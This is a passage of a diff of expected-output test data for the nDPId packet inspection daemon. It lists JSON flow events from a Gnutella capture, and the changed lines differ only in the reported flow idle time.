00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":72853,"flow_last_seen":553213,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"165.169.226.142","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":72853,"flow_last_seen":553213,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"165.169.226.142","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68108,"flow_last_seen":77122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.246.157.94","src_port":50227,"dst_port":51175,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68108,"flow_last_seen":77122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.246.157.94","src_port":50227,"dst_port":51175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68108,"flow_last_seen":77122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.246.157.94","src_port":50227,"dst_port":51175,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68108,"flow_last_seen":77122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.246.157.94","src_port":50227,"dst_port":51175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":72853,"flow_last_seen":553212,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"172.97.199.14","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":72853,"flow_last_seen":553212,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"172.97.199.14","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":312957,"flow_last_seen":553212,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.115.218.152","src_port":28681,"dst_port":5900,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":312957,"flow_last_seen":553212,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.115.218.152","src_port":28681,"dst_port":5900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":72849,"flow_last_seen":553212,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.69.159.133","src_port":28681,"dst_port":28000,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":72849,"flow_last_seen":553212,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.69.159.133","src_port":28681,"dst_port":28000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66077,"flow_last_seen":75077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.244.64.237","src_port":50215,"dst_port":4704,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66077,"flow_last_seen":75077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.244.64.237","src_port":50215,"dst_port":4704,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00570{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68110,"flow_last_seen":77122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.3.103.37","src_port":50230,"dst_port":17296,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00555{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68110,"flow_last_seen":77122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.3.103.37","src_port":50230,"dst_port":17296,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66077,"flow_last_seen":75077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.244.64.237","src_port":50215,"dst_port":4704,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66077,"flow_last_seen":75077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.244.64.237","src_port":50215,"dst_port":4704,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00570{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68110,"flow_last_seen":77122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.3.103.37","src_port":50230,"dst_port":17296,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00555{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68110,"flow_last_seen":77122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.3.103.37","src_port":50230,"dst_port":17296,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":287311,"flow_last_seen":551891,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"74.210.244.72","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":287311,"flow_last_seen":551891,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"74.210.244.72","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":70230,"flow_last_seen":433135,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.138.20.110","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":70230,"flow_last_seen":433135,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.138.20.110","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":89732,"flow_last_seen":98763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.119.55.28","src_port":50288,"dst_port":20347,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":89732,"flow_last_seen":98763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.119.55.28","src_port":50288,"dst_port":20347,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":64033,"flow_last_seen":73064,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.78.171.204","src_port":50207,"dst_port":6346,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":64033,"flow_last_seen":73064,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.78.171.204","src_port":50207,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":89732,"flow_last_seen":98763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.119.55.28","src_port":50288,"dst_port":20347,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":89732,"flow_last_seen":98763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.119.55.28","src_port":50288,"dst_port":20347,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":64033,"flow_last_seen":73064,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.78.171.204","src_port":50207,"dst_port":6346,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":64033,"flow_last_seen":73064,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.78.171.204","src_port":50207,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82061,"flow_last_seen":493284,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.131.24.72","src_port":28681,"dst_port":30711,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82061,"flow_last_seen":493284,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.131.24.72","src_port":28681,"dst_port":30711,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90744,"flow_last_seen":99778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":50305,"dst_port":63637,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90744,"flow_last_seen":99778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":50305,"dst_port":63637,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":99,"flow_first_seen":71205,"flow_last_seen":593737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":6090,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.214.154.216","src_port":50248,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65061,"flow_last_seen":74092,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.237.116.22","src_port":50208,"dst_port":8683,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65061,"flow_last_seen":74092,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.237.116.22","src_port":50208,"dst_port":8683,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90744,"flow_last_seen":99778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":50305,"dst_port":63637,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90744,"flow_last_seen":99778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":50305,"dst_port":63637,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":99,"flow_first_seen":71205,"flow_last_seen":593737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":6090,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.214.154.216","src_port":50248,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65061,"flow_last_seen":74092,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.237.116.22","src_port":50208,"dst_port":8683,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65061,"flow_last_seen":74092,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.237.116.22","src_port":50208,"dst_port":8683,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":520019,"flow_last_seen":523077,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":50214,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
-00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90737,"flow_last_seen":99778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.89.249.8","src_port":50290,"dst_port":50649,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90737,"flow_last_seen":99778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.89.249.8","src_port":50290,"dst_port":50649,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 